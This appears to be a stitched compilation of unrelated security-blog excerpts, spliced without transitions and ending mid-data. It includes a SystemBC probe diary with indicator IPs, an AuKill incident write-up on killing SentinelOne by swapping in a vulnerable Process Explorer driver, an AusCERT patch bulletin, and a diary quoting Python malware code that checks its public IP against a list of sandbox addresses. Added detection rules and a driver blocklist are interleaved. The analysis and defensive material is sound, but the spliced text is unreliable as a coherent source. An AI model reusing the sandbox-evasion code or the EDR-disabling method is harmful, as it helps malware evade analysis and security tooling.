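Checking the PE signature through e_lfanew rather than trusting the MZ prefix alone avoids a classic triage mistake, since plenty of non-executable formats and DOS stubs start with MZ.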
[1] https://en.wikipedia.org/wiki/Inotify
Xavier Mertens (@xme)
This month, my DShield sensor captured for the first time this request: /systembc/password.php. I checked back for the past 6 months and have only noticed this request 5 times this month, from 4 different sources. According to some references, this is likely the SystemBC Remote Access Trojan (RAT); all 4 IPs are part of the Digital Ocean ASN and only one has been reported as likely malicious. Several samples have been reported to Any.run this month.
To verify if there was some kind of change, I reviewed DShield log submissions for the past year and noticed nothing really significant until the beginning of Jan 2023 looking for this directory. However, starting on the 3rd of Aug 2023, there was a significant change in the daily report for this directory, going from an average of 30 submissions to 445 and hovering in the hundreds since then.[1]
Indicators of Compromise
170.64.155.243
161.35.62.73
165.22.160.237
178.128.79.70
/systembc/password.php
/upl.php
———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu
Executive summary
AT&T Alien Labs researchers recently discovered a massive campaign of threats delivering a proxy server application to Windows machines. A company is charging for proxy service on traffic that goes through those machines. This is a continuation of research described in our blog on Mac systems turned into proxy exit nodes by AdLoad.
In this research, Alien Labs identified a company that offers proxy services, wherein proxy requests are rerouted through compromised systems that have been transformed into residential exit nodes due to malware infiltration. Although the proxy website claims that its exit nodes come only from users who have been informed and agreed to the use of their device, Alien Labs has evidence that malware writers are installing the proxy silently in infected systems. In addition, as the proxy application is signed, it has no anti-virus detection, going under the radar of security…
Posted by:
Ofer Caspi
Executive summary
On April 21st, 2023, AT&T Managed Extended Detection and Response (MXDR) investigated an attempted ransomware attack on one of our clients, a home improvement business. The investigation revealed the attacker used AuKill malware on the client’s print server to disable the server’s installed EDR solution, SentinelOne, by brute forcing an administrator account and downgrading a driver to a vulnerable version.
AuKill, first identified by Sophos X-Ops researchers in June 2021, is a sophisticated malware designed to target and neutralize specific EDR solutions, including SentinelOne and Sophos. Distributed as a dropper, AuKill drops a vulnerable driver named PROCEXP.SYS (from Process Explorer release version 16.32) into the system’s C:\Windows\System32\drivers folder. This malware has been observed in the wild, utilized by ransomware groups to bypass endpoint security measures and effectively spread ransomware variants such as Medusa Locker and Lockbit on vulnerable systems.
In this case, SentinelOne managed to isolate most of the malicious files before being disabled, preventing a full-scale ransomware incident. As a result, AT&T MXDR found no evidence of data exfiltration or encryption. Despite this, the client opted to rebuild the print server as a precautionary measure. This study provides an in-depth analysis of the attack and offers recommendations to mitigate the risk of future attacks.
Investigating the first phase of the attack
Initial intrusion
The targeted asset was the print server, which we found unusual. However, upon further investigation we concluded the attacker misidentified the asset as a Domain Controller (DC), as it had recently been repurposed from a DC to a print server. The attacker needed both local administrator credentials and kernel-level access to successfully run AuKill and disable SentinelOne on the asset. To gain those local administrator credentials, the attacker successfully brute-forced an administrator account. Shortly after the compromise, this account was observed making unauthorized registry changes.
Establishing a beachhead
After compromising the local administrator account, the attackers used the “Users\Administrator\Music\aSentinel” folder as a staging area for subsequent phases of their attack. All AuKill-related binaries and scripts were executed from this path, with the innocuous “Music” folder name helping to conceal their malicious activities.
AuKill malware has been found to operate using two Windows services named “aSentinel.exe” and “aSentinelX.exe” in its SentinelOne variant. In other variants, it targets different EDRs, such as Sophos, by utilizing corresponding Windows services like “aSophos.exe” and “aSophosX.exe”.
Establishing persistence
We also discovered “aSentinel.exe” running from “C:\Windows\system32”, indicating that the attackers attempted to establish a foothold on the compromised server. Malware authors frequently target the system32 folder because it is a trusted location, and security software may not scrutinize files within it as closely as those in other locations. This can help malware bypass security measures and remain hidden. It is likely that the malware was initially placed in the “Users\Administrator\Music\aSentinel” directory and later copied to the system32 directory for persistence.
Network reconnaissance
Our investigation also revealed that PCHunter, a publicly accessible utility previously exploited in ransomware incidents like Dharma, was running from the “Users\Administrator\Music\aSentinel” directory. This suggests that the attackers used PCHunter as a reconnaissance tool to survey the client’s network before deploying the EDR killer malware. Additionally, PCHunter enables threat actors to terminate programs and interface directly with the Windows kernel, which aligns with the needs of the attacker. We observed PCHunter generating several randomly named .sys files, as illustrated below:
Preventing data recovery
We found that the attacker deleted shadow volume copies from the print server. Windows creates these copies to restore files and folders to previous versions in case of data loss. By removing the shadow copies, the attacker was attempting to make it more challenging for our client to recover their files if they were successfully encrypted. Although no ransomware was deployed, the deletion of shadow copies reveals the attackers’ intentions. This information, together with the usage of PCHunter and the staging of the EDR killer malware, paints a more complete picture of the attacker’s objectives and tactics.
Bypassing native Windows protection
With all these pieces in place, the attacker last needed to acquire kernel-level access. Despite gaining administrator rights early on, the attacker did not have enough control over the system to kill SentinelOne at this time. EDR solutions are classified as essential by Windows and are protected from being turned off by attackers when they escalate privileges. To successfully circumvent these safeguards, the attacker would need to travel one level deeper into the operating system and gain kernel-level access to the machine.
Investigating the second phase of the attack
Dropping the vulnerable driver
Our team discovered that AuKill had replaced the current Process Explorer driver, PROCEXP152.sys, with an outdated and vulnerable version named PROCEXP.SYS (from Process Explorer release version 16.32), located in the C:\Windows\System32\drivers directory. The alarm screenshot below demonstrates how AuKill swapped the existing driver with this older version, making the system susceptible to further exploitation.
Windows incorporates a security feature called Driver Signature Enforcement, which ensures that kernel-mode drivers are signed by a valid code signing authority before they can run. To bypass this security measure, the attackers exploited the insecure PROCEXP.SYS driver, which was produced and signed by Microsoft at an earlier date. As demonstrated in the SentinelOne screenshot below, the driver is signed and verified by Microsoft. Furthermore, the originating process was aSentinel.exe, an executable created to disable SentinelOne.
Acquiring kernel-level access
Process Explorer, a legitimate system monitoring tool developed by Microsoft’s Sysinternals team, enables administrators to examine and manage applications’ ongoing processes, as well as their associated threads, handles, and DLLs.
Upon startup, Process Explorer loads a signed kernel-mode driver, facilitating interaction with the system’s kernel, which is responsible for managing hardware and resources. Normally, that driver is PROCEXP152.sys. The attacker replaced the PROCEXP152.sys driver on the print server with the exploitable PROCEXP.SYS, employing what is known as a BYOVD (Bring Your Own Vulnerable Driver) attack. The attacker used this method to exploit the now vulnerable kernel mode driver to gain the kernel-level access they needed to successfully kill SentinelOne.
Killing SentinelOne
The kernel-mode driver used by Process Explorer has the unique ability to terminate handles that are inaccessible even to administrators. A handle is an identifier that corresponds to a specific resource opened by a process, such as a file or a registry key. At this point, AuKill hijacked Process Explorer’s kernel driver to specifically target protected handles associated with SentinelOne processes running on the print server. The SentinelOne processes were killed when the protected process handles were closed, rendering the EDR powerless. AuKill then generated several threads to ensure that these EDR processes remained disabled and did not resume. Each thread concentrated on a certain SentinelOne component and regularly checked to see if the targeted processes were active. If they were, AuKill would terminate them. SentinelOne was out of the way and no longer an obstacle to the attacker.
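The chain described above (a staging directory under a user's Music folder, the aSentinel/aSophos binaries, a .sys file written into the drivers directory by a process running from a user profile) can be turned into simple detection rules. The following is an added example written for this write-up, not AT&T MXDR's or SentinelOne's own detection logic; the telemetry records are constructed to mirror the behaviour described, the field names (type, image, path, user) are an assumed schema, the PCHunter file name is assumed, and the Pictures and Videos folders are an assumed generalization of the Music folder seen here.

```python
import ntpath

# Constructed endpoint telemetry modelled on the incident narrative; not real logs.
# Schema (type/image/path/user) is assumed for the example.
EVENTS = [
    {"type": "process_create", "image": r"C:\Windows\System32\svchost.exe",
     "user": r"NT AUTHORITY\SYSTEM"},
    # PCHunter run from the staging directory (file name assumed)
    {"type": "process_create", "image": r"C:\Users\Administrator\Music\aSentinel\pchunter.exe",
     "user": r"PRINTSRV\Administrator"},
    {"type": "process_create", "image": r"C:\Users\Administrator\Music\aSentinel\aSentinel.exe",
     "user": r"PRINTSRV\Administrator"},
    # the vulnerable driver dropped into the drivers directory by the staged binary
    {"type": "file_write", "path": r"C:\Windows\System32\drivers\PROCEXP.SYS",
     "image": r"C:\Users\Administrator\Music\aSentinel\aSentinel.exe"},
    # benign driver servicing by the OS (constructed control case)
    {"type": "file_write", "path": r"C:\Windows\System32\drivers\tcpip.sys",
     "image": r"C:\Windows\servicing\TrustedInstaller.exe"},
    # the copy used for persistence from system32
    {"type": "process_create", "image": r"C:\Windows\System32\aSentinel.exe",
     "user": r"PRINTSRV\Administrator"},
]

# Binary names from the write-up (SentinelOne and Sophos variants).
EDR_KILLER_NAMES = {"asentinel.exe", "asentinelx.exe", "asophos.exe", "asophosx.exe"}
# Music is the folder observed here; Pictures/Videos are an assumed generalization.
USER_MEDIA_DIRS = ("\\music\\", "\\pictures\\", "\\videos\\")
DRIVER_DIR = "c:\\windows\\system32\\drivers\\"


def rule_exec_from_user_media_dir(ev):
    """Process started from a media folder inside a user profile."""
    p = ev.get("image", "").lower()
    return ev["type"] == "process_create" and "\\users\\" in p and any(d in p for d in USER_MEDIA_DIRS)


def rule_known_edr_killer_binary(ev):
    """Image name matches a known AuKill binary or PCHunter (name prefix assumed)."""
    name = ntpath.basename(ev.get("image", "")).lower()
    return name in EDR_KILLER_NAMES or name.startswith("pchunter")


def rule_driver_dropped_from_user_profile(ev):
    """A .sys file written under the drivers directory by a process running from C:\\Users."""
    if ev["type"] != "file_write":
        return False
    path, image = ev["path"].lower(), ev["image"].lower()
    return path.startswith(DRIVER_DIR) and path.endswith(".sys") and image.startswith("c:\\users\\")


RULES = [rule_exec_from_user_media_dir, rule_known_edr_killer_binary, rule_driver_dropped_from_user_profile]


def triage(events):
    """Return (event_index, rule_name) pairs for every rule that fires."""
    hits = []
    for i, ev in enumerate(events):
        for rule in RULES:
            if rule(ev):
                hits.append((i, rule.__name__))
    return hits


if __name__ == "__main__":
    for idx, rule_name in triage(EVENTS):
        print(f"event {idx}: {rule_name} -> {EVENTS[idx]}")
```

The driver-write rule is the one worth tuning in a real environment: legitimate driver installs come from installers and the servicing stack, so a writer whose image lives under a user profile is a strong signal on its own, independent of whether the dropped file carries a valid Microsoft signature.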
Response
Customer interaction
At this point, the attacker had gained privileged access to the asset, deployed their malware, and successfully killed the endpoint protection solution, SentinelOne. Based on the Cyber Kill Chain methodology developed by Lockheed Martin, we can conclude that the attacker had now successfully reached the “Command and Control” stage. However, the attacker did not reach the “Actions on Objectives” stage, as SentinelOne managed to disrupt ransomware deployment enough before it was killed to prevent any additional damage.
Any attempts to re-deploy malware or move laterally following the disablement of the EDR were thwarted by our team, who swiftly alerted the client to the activity and advised that the asset be taken offline and isolated from the rest of the network. Our team informed the client that the shadow copies had been deleted and SentinelOne had been turned off on their print server. After having our threat hunters thoroughly review their environment, we reassured the client that no sensitive information was exfiltrated or encrypted. In response to the attack, the client moved to rebuild their print server and reinstall SentinelOne.
Recommendations
As BYOVD attacks to bypass EDR software become more widespread, we strongly advise blacklisting outdated drivers with a known history of exploitation. Furthermore, we encourage our clients to maintain an inventory of the drivers installed on their systems, ensuring they remain current and secure. Lastly, we recommend bolstering the security of administrator accounts to defend against brute force attacks, as the incident detailed in this blog post could not have transpired without the initial privileged user compromise.
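The driver-inventory recommendation above can be checked mechanically: compare every installed driver against a blocklist of file names and the highest version known to be exploitable. The following is an added example written for this post, not a tool from AT&T or Microsoft; the inventory records are constructed, the version and signer strings on them are placeholders, and only the PROCEXP.SYS entry (Process Explorer 16.32) comes from the incident described here. The point it makes is that a valid Microsoft signature does not exempt a driver from the check.

```python
from dataclasses import dataclass


@dataclass
class DriverRecord:
    name: str      # file name as found on disk
    version: str   # file/product version string
    signer: str    # signing certificate subject (placeholder values below)
    path: str


# Constructed single-host inventory; versions and signers are placeholders, not real data.
INVENTORY = [
    DriverRecord("PROCEXP152.sys", "17.0", "Microsoft (placeholder)",
                 r"C:\Windows\System32\drivers\PROCEXP152.sys"),
    DriverRecord("PROCEXP.SYS", "16.32", "Microsoft (placeholder)",
                 r"C:\Windows\System32\drivers\PROCEXP.SYS"),
    DriverRecord("tcpip.sys", "10.0.19041.1", "Microsoft (placeholder)",
                 r"C:\Windows\System32\drivers\tcpip.sys"),
]

# file name (lower case) -> highest version known to be exploitable (inclusive).
# Only the PROCEXP.SYS entry is taken from the write-up; in practice this list should be
# fed from a maintained source such as Microsoft's vulnerable driver blocklist.
BLOCKLIST = {"procexp.sys": "16.32"}


def parse_version(v):
    """'16.32' -> (16, 32); non-numeric components are ignored."""
    return tuple(int(p) for p in v.split(".") if p.isdigit())


def check_drivers(inventory, blocklist=BLOCKLIST):
    """Return one finding per installed driver whose name/version is on the blocklist."""
    findings = []
    for d in inventory:
        ceiling = blocklist.get(d.name.lower())
        if ceiling is None:
            continue
        if parse_version(d.version) <= parse_version(ceiling):
            findings.append({
                "path": d.path,
                "version": d.version,
                "signer": d.signer,  # reported, but deliberately not used as an exemption
                "reason": f"{d.name} version {d.version} <= {ceiling} is on the vulnerable-driver blocklist",
            })
    return findings


if __name__ == "__main__":
    for f in check_drivers(INVENTORY):
        print(f["reason"], "at", f["path"])
```

A useful follow-up on a host that raises a finding is to compare the inventory against a known-good baseline: the write-up's key observation is that the legitimate PROCEXP152.sys was swapped for the older file, so the appearance of a second Process Explorer driver is itself the anomaly.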
Black Bersek Malware Shares Similarities With Cylance Ransomware
EclecticIQ analysts assess that Black Bersek ransomware shares multiple similarities with Cylance ransomware. Both malware families share code similarities, very similar command-line arguments, and the same encryption cipher, Salsa20. Ransomware family lifespan is decreasing, resulting in higher numbers of variants. [1] Ransomware families and syndicates are still constantly shifting despite a reported downturn in overall ransomware infections from 2022-2023 [2, 3]. The average ransomware lifespan dropped from 153 days in 2021 to 70 days in 2022. Chainalysis and Malwarebytes report that diminishing profits, specifically victims refusing to pay, may be driving the drop in ransomware family lifespan. [2] As a result, organizations must also change tactics more quickly to keep defenses up to date, as families cycle faster with changing techniques.
Digital Threats: Research and Practice, Volume 4, Issue 2, Page 1-22, June 2023.
FortiGuard Labs uncovers the attack method using the “search-ms” protocol to spread XWorm and Remcos, and also explores the functionality of the Freeze.rs Rust injector and SYK Crypter.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT Security Bulletin
ASB-2023.0166
Microsoft Patch Tuesday update for Microsoft System Center for August 2023
9 August 2023
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Windows Defender Antimalware Platform
Operating System: Windows
Resolution: Patch/Upgrade
CVE Names: CVE-2023-38175
Comment: CVSS (Max): 7.8 CVE-2023-38175 (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C)
CVSS Source: Microsoft
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C
OVERVIEW
Microsoft has released its monthly security patch update for the
month of August 2023.
This update resolves 1 vulnerability across the following product(s):
[1]
Windows Defender Antimalware Platform
IMPACT
Microsoft has given the following details regarding this vulnerability.
Details          Impact                   Severity
CVE-2023-38175   Elevation of Privilege   Important
MITIGATION
Microsoft recommends updating the software to the latest available
version available on the Microsoft Update Catalog. [1]
REFERENCES
[1] Microsoft Security Update Guidance
https://portal.msrc.microsoft.com/en-us/security-guidance
AusCERT has made every effort to ensure that the information contained
in this document is accurate. However, the decision to use the information
described is the responsibility of each user or organisation. The decision to
follow or act on information or advice contained in this security bulletin is
the responsibility of each user or organisation, and should be considered in
accordance with your organisation’s site policies and procedures. AusCERT
takes no responsibility for consequences which may arise from following or
acting on information or advice contained in this security bulletin.
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
iQIVAwUBZNLwgMkNZI30y1K9AQixLg//XxPHXFTkdBYqxIWF9QbkDwSdahzqzoGr
SbUeVdy/Gd3+0l2ocdgD2iPu6z0QWNy4OA3Bmm/bpseUS6ZmHHpDB+rCyD9dVLit
JgfQuV4w9RJzgMnnpwTyzkQI0sTpxkh/7/l9Swj5L6wP3u23U6JEDXcAJgCbC99F
Gb3p1nfXI4p0p1YoxrZDykoDmf9owKNZXHLocFwuaNOhLBju0y2VKKVIGujAxeLT
6mbxMCnwjw1VXkUu4K2vcw+d7SdYtk47LlYg/9HhXPoS89Wa7Qee6aWzNCj267ep
ljVlqVuEwLadpaAspNSXXvna8LYt4Zk6ea4AeD1/E3QYem0PTv/EzO9J0+QsQUYm
3oiPYdgkaluQ1NrLoPB6ky8fBHK/4iqQT7TVExnRD/5Og+hif0UxG9cTc6KHd2vq
DoTlhfSbF1rnkhWwt1UQ+YhmsLPo/XDcU7xSjP+GTdzpRUsI8Sbjd5AgRbHmiR3K
cRHc9AIZid1dPqFy3IVWj6ypKIa7ElItUcNHvhGzdvNPioBIs/oG5fh9eG56wVBz
6DIaHOq6km29KJuympJz0ZOmU6Pl+fLqIUE1l+F9ziT9ZzJ182lcJW097aIN31oa
XyhhjBPprB/HpmXeeTGIUsdXJNq/6BJ/7fJELtPRK2mAQ+q9JcpHwezF2y47Ip5d
yrg3TyUOKJc=
=Cetm
-----END PGP SIGNATURE-----
Modern malware samples implement a lot of anti-debugging and anti-analysis techniques. The idea is to slow down the malware analyst’s job or, more simply, to bypass security solutions like sandboxes. These days, I see more and more malware samples written in Python that have these built-in capabilities. One of them is the detection of “suspicious” IP addresses.
The last one I found has the SHA256 9d4d651095f9e03a0321def2dc47252ed22334664218f3df9e2f3dbbf99cdc1b with a VT score of 8/57[1].
Here is a common code snippet:
import urllib.request

def exit_program(reason):
    # The sample's own exit helper is not shown in the diary; this stub only
    # mirrors its visible behaviour (stop the script with a message).
    raise SystemExit(reason)

def check_ip():
    blacklisted = {...}  # the sample's hard-coded set of IP addresses (listed below)
    while True:
        try:
            ip = urllib.request.urlopen('https://checkip.amazonaws.com').read().decode().strip()
            if ip in blacklisted:
                exit_program('Blacklisted IP Detected')
            return
        except:  # any network error: retry until the lookup succeeds
            pass
The malware will query the public IP address of the host where it is running and, if it is present on the “blacklisted” list, it will exit… But what are these IP addresses? I had a look at them and here is the list:
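Because this check is built from two recognizable ingredients, a hard-coded collection of IP literals and a call to a public "what is my IP" service, it can be spotted statically in a Python sample without running it. The following is an added example for this diary, not code from the sample or from the ISC; it parses a constructed script that imitates the snippet above with Python's ast module and reports both ingredients. The list of lookup services is an assumption beyond the single checkip.amazonaws.com host seen here, and the sample IPs are taken from the table below.

```python
import ast
import ipaddress

# Constructed sample imitating the pattern in the diary; not the real malware source.
SAMPLE = '''
import urllib.request

def check_ip():
    blacklisted = {"34.105.183.68", "23.128.248.46", "195.74.76.222"}
    while True:
        try:
            ip = urllib.request.urlopen("https://checkip.amazonaws.com").read().decode().strip()
            if ip in blacklisted:
                exit_program("Blacklisted IP Detected")
            return
        except:
            pass
'''

# checkip.amazonaws.com is the one seen in the sample; the others are assumed additions.
PUBLIC_IP_SERVICES = ("checkip.amazonaws.com", "api.ipify.org", "ifconfig.me", "icanhazip.com")


def _is_ipv4(s):
    try:
        ipaddress.IPv4Address(s)
        return True
    except ValueError:
        return False


def find_ip_literals(tree):
    """Map variable name -> sorted IPs for set/list/tuple literals made only of IPv4 strings."""
    found = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Assign) and isinstance(node.value, (ast.Set, ast.List, ast.Tuple)):
            elts = node.value.elts
            vals = [e.value for e in elts if isinstance(e, ast.Constant) and isinstance(e.value, str)]
            if elts and len(vals) == len(elts) and all(_is_ipv4(v) for v in vals):
                for target in node.targets:
                    if isinstance(target, ast.Name):
                        found[target.id] = sorted(vals)
    return found


def find_public_ip_lookups(tree):
    """Return the public-IP service hostnames that appear in any string constant."""
    hits = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            for svc in PUBLIC_IP_SERVICES:
                if svc in node.value:
                    hits.add(svc)
    return hits


def scan_source(src):
    """Flag a script that both looks up its public IP and carries a literal IP collection."""
    tree = ast.parse(src)
    ip_sets = find_ip_literals(tree)
    lookups = find_public_ip_lookups(tree)
    return {"ip_sets": ip_sets, "lookups": sorted(lookups),
            "suspicious": bool(ip_sets) and bool(lookups)}


if __name__ == "__main__":
    print(scan_source(SAMPLE))
```

The extracted set doubles as a feed: every IP the sample refuses to run on is, from the author's point of view, an analysis system, so the list tells a defender which of their own egress addresses are already fingerprinted. Samples that build the set at runtime (base64, string concatenation) will not match this literal-only rule, which is the usual trade-off of a static check.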
IP Address | PTR Record | AS Name | AS Country | Attacks (ISC) | Count (ISC)
--- | --- | --- | --- | --- | ---
20[.]99[.]160[.]173 | NXDOMAIN | MICROSOFT-CORP-MSN-AS-BLOCK | US | 0 | 0
23[.]128[.]248[.]46 | tor-exit46[.]stormycloud[.]org | DATAIDEAS-LLC | US | 0 | 0
34[.]105[.]0[.]27 | 27[.]0[.]105[.]34[.]bc[.]googleusercontent[.]com | GOOGLE-CLOUD-PLATFORM | US | 0 | 0
34[.]105[.]183[.]68 | 68[.]183[.]105[.]34[.]bc[.]googleusercontent[.]com | GOOGLE-CLOUD-PLATFORM | US | 21 | 32
34[.]105[.]72[.]241 | 241[.]72[.]105[.]34[.]bc[.]googleusercontent[.]com | GOOGLE-CLOUD-PLATFORM | US | 0 | 0
34[.]138[.]96[.]23 | 23[.]96[.]138[.]34[.]bc[.]googleusercontent[.]com | GOOGLE-CLOUD-PLATFORM | US | 0 | 0
34[.]141[.]146[.]114 | 114[.]146[.]141[.]34[.]bc[.]googleusercontent[.]com | GOOGLE-CLOUD-PLATFORM | US | 19 | 28
34[.]141[.]245[.]25 | 25[.]245[.]141[.]34[.]bc[.]googleusercontent[.]com | GOOGLE-CLOUD-PLATFORM | US | 35 | 51
34[.]142[.]74[.]220 | 220[.]74[.]142[.]34[.]bc[.]googleusercontent[.]com | | US | 0 | 0
34[.]145[.]195[.]58 | 58[.]195[.]145[.]34[.]bc[.]googleusercontent[.]com | GOOGLE-CLOUD-PLATFORM | US | 0 | 0
34[.]145[.]89[.]174 | 174[.]89[.]145[.]34[.]bc[.]googleusercontent[.]com | | US | 0 | 0
34[.]253[.]248[.]228 | ec2-34-253-248-228[.]eu-west-1[.]compute[.]amazonaws[.]com | AMAZON-02 | US | 0 | 0
34[.]83[.]46[.]130 | 130[.]46[.]83[.]34[.]bc[.]googleusercontent[.]com | GOOGLE-CLOUD-PLATFORM | US | 0 | 0
34[.]85[.]243[.]241 | 241[.]243[.]85[.]34[.]bc[.]googleusercontent[.]com | GOOGLE-CLOUD-PLATFORM | US | 0 | 0
34[.]85[.]253[.]170 | 170[.]253[.]85[.]34[.]bc[.]googleusercontent[.]com | GOOGLE-CLOUD-PLATFORM | US | 0 | 0
35[.]192[.]93[.]107 | 107[.]93[.]192[.]35[.]bc[.]googleusercontent[.]com | | US | 0 | 0
35[.]199[.]6[.]13 | 13[.]6[.]199[.]35[.]bc[.]googleusercontent[.]com | | US | 0 | 0
35[.]229[.]69[.]227 | 227[.]69[.]229[.]35[.]bc[.]googleusercontent[.]com | | US | 0 | 0
35[.]237[.]47[.]12 | 12[.]47[.]237[.]35[.]bc[.]googleusercontent[.]com | | US | 0 | 0
64[.]124[.]12[.]162 | 64[.]124[.]12[.]162[.]IDIA-144793-004-ZYO[.]zip[.]zayo[.]com | ZAYO-6461 | US | 0 | 0
78[.]139[.]8[.]50 | catv-78-139-8-50[.]catv[.]fixed[.]vodafone[.]hu | ASN-VODAFONE- | HU | 0 | 0
79[.]104[.]209[.]33 | NXDOMAIN | SOVAM-AS | RU | 0 | 0
80[.]211[.]0[.]97 | host97-0-211-80[.]serverdedicati[.]aruba[.]it | ARUBA-ASN | IT | 0 | 0
84[.]147[.]54[.]113 | p54933671[.]dip0[.]t-ipconnect[.]de | DTAG Internet service provider operations | DE | 0 | 0
84[.]147[.]62[.]12 | p54933e0c[.]dip0[.]t-ipconnect[.]de | DTAG Internet service provider operations | DE | 0 | 0
87[.]166[.]50[.]213 | p57a632d5[.]dip0[.]t-ipconnect[.]de | DTAG Internet service provider operations | DE | 0 | 0
88[.]132[.]225[.]100 | host-88-132-225-100[.]kabelszat2002[.]hu | GAX-KABELSZAT | HU | 0 | 0
88[.]132[.]226[.]203 | host-88-132-226-203[.]kabelszat2002[.]hu | GAX-KABELSZAT | HU | 0 | 0
88[.]132[.]227[.]238 | host-88-132-227-238[.]kabelszat2002[.]hu | GAX-KABELSZAT | HU | 0 | 0
88[.]132[.]231[.]71 | host-88-132-231-71[.]kabelszat2002[.]hu | GAX-KABELSZAT | HU | 0 | 0
88[.]153[.]199[.]169 | ip-088-153-199-169[.]um27[.]pools[.]vodafone-ip[.]de | VODANET International IP-Backbone of Vodafone | DE | 0 | 0
92[.]211[.]109[.]160 | ipservice-092-211-109-160[.]092[.]211[.]pools[.]vodafone-ip[.]de | VODANET International IP-Backbone of Vodafone | DE | 0 | 0
92[.]211[.]192[.]144 | ipservice-092-211-192-144[.]092[.]211[.]pools[.]vodafone-ip[.]de | VODANET International IP-Backbone of Vodafone | DE | 0 | 0
92[.]211[.]52[.]62 | ipservice-092-211-052-062[.]092[.]211[.]pools[.]vodafone-ip[.]de | VODANET International IP-Backbone of Vodafone | DE | 0 | 0
92[.]211[.]55[.]199 | ipservice-092-211-055-199[.]092[.]211[.]pools[.]vodafone-ip[.]de | VODANET International IP-Backbone of Vodafone | DE | 0 | 0
93[.]216[.]75[.]209 | p5dd84bd1[.]dip0[.]t-ipconnect[.]de | DTAG Internet service provider operations | DE | 0 | 0
95[.]25[.]204[.]90 | 95-25-204-90[.]broadband[.]corbina[.]ru | CORBINA-AS OJSC Vimpelcom | RU | 0 | 0
95[.]25[.]81[.]24 | 95-25-81-24[.]broadband[.]corbina[.]ru | CORBINA-AS OJSC Vimpelcom | RU | 0 | 0
104[.]18[.]12[.]38 | NXDOMAIN | CLOUDFLARENET | US | 0 | 0
109[.]145[.]173[.]169 | host109-145-173-169[.]range109-145[.]btcentralplus[.]com | BT-UK-AS BTnet UK Regional network | GB | 0 | 0
109[.]74[.]154[.]90 | SERVFAIL | VNET-AS | SK | 0 | 0
109[.]74[.]154[.]91 | SERVFAIL | VNET-AS | SK | 0 | 0
109[.]74[.]154[.]92 | SERVFAIL | VNET-AS | SK | 0 | 0
178[.]239[.]165[.]70 | 70[.]165[.]239[.]178[.]baremetal[.]zare[.]com | BANDWIDTH-AS | GB | 1 | 1
188[.]105[.]91[.]116 | dslb-188-105-091-116[.]188[.]105[.]pools[.]vodafone-ip[.]de | VODANET International IP-Backbone of Vodafone | DE | 0 | 0
188[.]105[.]91[.]143 | dslb-188-105-091-143[.]188[.]105[.]pools[.]vodafone-ip[.]de | VODANET International IP-Backbone of Vodafone | DE | 0 | 0
188[.]105[.]91[.]173 | dslb-188-105-091-173[.]188[.]105[.]pools[.]vodafone-ip[.]de | VODANET International IP-Backbone of Vodafone | DE | 0 | 0
192[.]211[.]110[.]74 | NXDOMAIN | DNIC-ASBLK-00721-00726 | US | 0 | 0
192[.]40[.]57[.]234 | NXDOMAIN | PERFORMIVE | US | 0 | 0
192[.]87[.]28[.]103 | 192[.]87[.]28[.]103[.]dyn[.]centr[.]nl | SURFNET-NL SURFnet, The Netherlands | NL | 1 | 1
193[.]128[.]114[.]45 | h193-128-114-45[.]ptr[.]roamsite[.]com | UUNET | US | 0 | 0
193[.]225[.]193[.]201 | NXDOMAIN | HBONE-AS KIFU | HU | 0 | 0
194[.]154[.]78[.]160 | SERVFAIL | SOVAM-AS | RU | 0 | 0
195[.]181[.]175[.]105 | unn-195-181-175-105[.]datapacket[.]com | CDN77 \^_^ | GB | 0 | 0
195[.]239[.]51[.]3 | NXDOMAIN | SOVAM-AS | RU | 0 | 0
195[.]239[.]51[.]59 | NXDOMAIN | SOVAM-AS | RU | 0 | 0
195[.]74[.]76[.]222 | r-222[.]76[.]74[.]195[.]ptr[.]avast[.]com | AVAST-AS-DC | CZ | 0 | 0
212[.]119[.]227[.]151 | NXDOMAIN | SOVAM-AS | RU | 0 | 0
212[.]119[.]227[.]167 | NXDOMAIN | SOVAM-AS | RU | 0 | 0
213[.]33[.]142[.]50 | mail[.]areal-hotel[.]ru | SOVAM-AS | RU | 0 | 0
Most of these IP addresses belong to major cloud providers. You can also see that some of them have a non-zero number of attacks/counts (results extracted from our API [2]). Probably most of them are sandboxes or analysis systems deployed by security companies or researchers? I did a quick nmap scan of them and most do not expose any port/service.
In the case above, the IP address verification is not performed to determine whether the computer is an interesting host to infect or not (classic scenario: when country “x” would like to attack country “y”). In such a scenario, the tests performed rely on the big IP pools used by Internet providers, the keyboard mapping, the OS language, etc.
I will keep this list of IP addresses up-to-date amongst my discovered samples and see if there are big changes.
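The observation that most of the listed addresses sit in cloud provider space can be reproduced from the table itself. The following added example (not part of the diary, and not an ISC tool) parses a constructed subset of the rows above, fills in the AS name from the PTR record where the table leaves the column empty, and summarizes the list by AS, by cloud share, and by which addresses the ISC sensors have already seen attacking. The PTR-suffix-to-provider mapping is an assumption of the example.

```python
from collections import Counter

# Subset of the diary's table, pipe-delimited and defanged as on the page (constructed input).
ROWS = """20[.]99[.]160[.]173|NXDOMAIN|MICROSOFT-CORP-MSN-AS-BLOCK|US|0|0
23[.]128[.]248[.]46|tor-exit46[.]stormycloud[.]org|DATAIDEAS-LLC|US|0|0
34[.]105[.]183[.]68|68[.]183[.]105[.]34[.]bc[.]googleusercontent[.]com|GOOGLE-CLOUD-PLATFORM|US|21|32
34[.]142[.]74[.]220|220[.]74[.]142[.]34[.]bc[.]googleusercontent[.]com||US|0|0
34[.]253[.]248[.]228|ec2-34-253-248-228[.]eu-west-1[.]compute[.]amazonaws[.]com|AMAZON-02|US|0|0
35[.]192[.]93[.]107|107[.]93[.]192[.]35[.]bc[.]googleusercontent[.]com||US|0|0
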